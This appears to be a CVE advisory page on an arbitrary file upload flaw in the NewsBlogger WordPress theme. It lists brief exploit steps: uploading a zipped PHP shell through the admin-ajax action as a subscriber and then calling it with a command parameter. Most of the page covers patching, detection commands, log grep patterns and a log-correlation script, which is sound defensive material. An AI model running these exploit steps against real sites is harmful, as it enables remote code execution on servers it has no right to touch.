How CVE-2025-1304 Works
The NewsBlogger WordPress theme (≤v0.2.5.1) lacks a capability check in the `newsblogger_install_and_activate_plugin()` function, allowing authenticated attackers (even subscribers) to upload arbitrary files. This flaw stems from improper validation during plugin installation via AJAX, enabling malicious actors to upload PHP shells or other executable files. Remote code execution (RCE) is achievable if the uploaded file is placed in a web-accessible directory. The vulnerability leverages WordPress’s `wp_ajax_` hook system, bypassing intended restrictions due to missing `current_user_can()` checks.
DailyCVE Form
Platform: WordPress
Version: ≤0.2.5.1
Vulnerability: Arbitrary File Upload
Severity: Critical
Date: 2025-05-01
What Undercode Says:
Exploit:
1. Craft a malicious plugin ZIP containing a PHP shell (e.g., shell.php):
zip -r evil_plugin.zip shell.php
2. Send AJAX request as a subscriber:
POST /wp-admin/admin-ajax.php HTTP/1.1 Action=newsblogger_install_and_activate_plugin&plugin=evil_plugin.zip
3. Trigger execution by accessing the uploaded file:
GET /wp-content/plugins/evil_plugin/shell.php?cmd=id
Protection:
1. Patch: Update the NewsBlogger theme to a version later than 0.2.5.1.
2. Restrict uploads: Add an `.htaccess` rule that blocks PHP execution in the directory where uploaded files land (the rule only covers that directory and its subdirectories; Apache 2.4 syntax shown, `Deny from all` on 2.2):
<FilesMatch "\.php$">
    Require all denied
</FilesMatch>
3. Capability check: Modify the theme code to verify `current_user_can('install_plugins')` before any plugin is installed.
Detection:
Scan for PHP files created or modified in the last day (the original pattern ".php" only matches a file literally named ".php"):
find /var/www/html -type f -name "*.php" -mtime -1
Mitigation Commands:
1. Remove vulnerable theme:
wp theme delete newsblogger
2. Audit users:
wp user list --role=subscriber
Code Fix (Patch Snippet):
function newsblogger_install_and_activate_plugin() {
    // The missing authorization check: reject any caller who may not install plugins.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_die( __( 'Unauthorized access.' ) );
    }
    // Rest of function logic
}
Log Analysis:
Check Apache logs for suspicious uploads (the action name is visible only when it is sent in the query string; POST bodies are not written to the access log):
grep "admin-ajax.php" /var/log/apache2/access.log | grep "newsblogger_install"
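As an added defender-side example (not code from the advisory or from the NewsBlogger project), this Python script correlates the two log patterns above on constructed sample lines: a POST to admin-ajax.php carrying the vulnerable action, followed within ten minutes by a GET from the same IP to a .php file under wp-content/plugins. It assumes Apache combined log format and, like the grep, only sees the action when it appears in the query string.

```python
import re
from datetime import datetime, timedelta

# Apache combined-log prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
VULN_ACTION = "action=newsblogger_install_and_activate_plugin"

# Constructed sample lines (not real traffic): one attack sequence, one benign client.
SAMPLE_LOG = """\
203.0.113.7 - - [01/May/2025:10:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=newsblogger_install_and_activate_plugin HTTP/1.1" 200 512
203.0.113.7 - - [01/May/2025:10:00:09 +0000] "GET /wp-content/plugins/evil_plugin/shell.php?cmd=id HTTP/1.1" 200 73
198.51.100.4 - - [01/May/2025:10:05:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 64
198.51.100.4 - - [01/May/2025:10:05:02 +0000] "GET /wp-content/plugins/akismet/readme.txt HTTP/1.1" 200 9000
"""

def parse_log(log_text):
    """Parse recognised access-log lines into dicts; unparseable lines are skipped."""
    recs = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
        rec["file"] = rec["path"].split("?", 1)[0]  # path without the query string
        recs.append(rec)
    return recs

def vulnerable_action_calls(recs):
    """POSTs to admin-ajax.php carrying the vulnerable action in the query string.
    POST bodies are not written to the access log, so body-only calls stay invisible."""
    return [r for r in recs if r["method"] == "POST"
            and r["file"].endswith("/admin-ajax.php") and VULN_ACTION in r["path"]]

def correlate_followup(recs, window=timedelta(minutes=10)):
    """(ip, php_path) pairs: the same IP fetched a .php file under wp-content/plugins
    within `window` after calling the vulnerable action."""
    hits = []
    for a in vulnerable_action_calls(recs):
        for b in recs:
            if (b["ip"] == a["ip"] and b["method"] == "GET"
                    and b["file"].startswith("/wp-content/plugins/") and b["file"].endswith(".php")
                    and a["ts"] <= b["ts"] <= a["ts"] + window):
                hits.append((a["ip"], b["file"]))
    return hits

for ip, path in correlate_followup(parse_log(SAMPLE_LOG)):
    print(f"possible CVE-2025-1304 upload+execute: {ip} -> {path}")
```

A hit from a subscriber-level account is the signal to treat the host as compromised; the action should never be reachable by that role once the capability check is in place.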
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode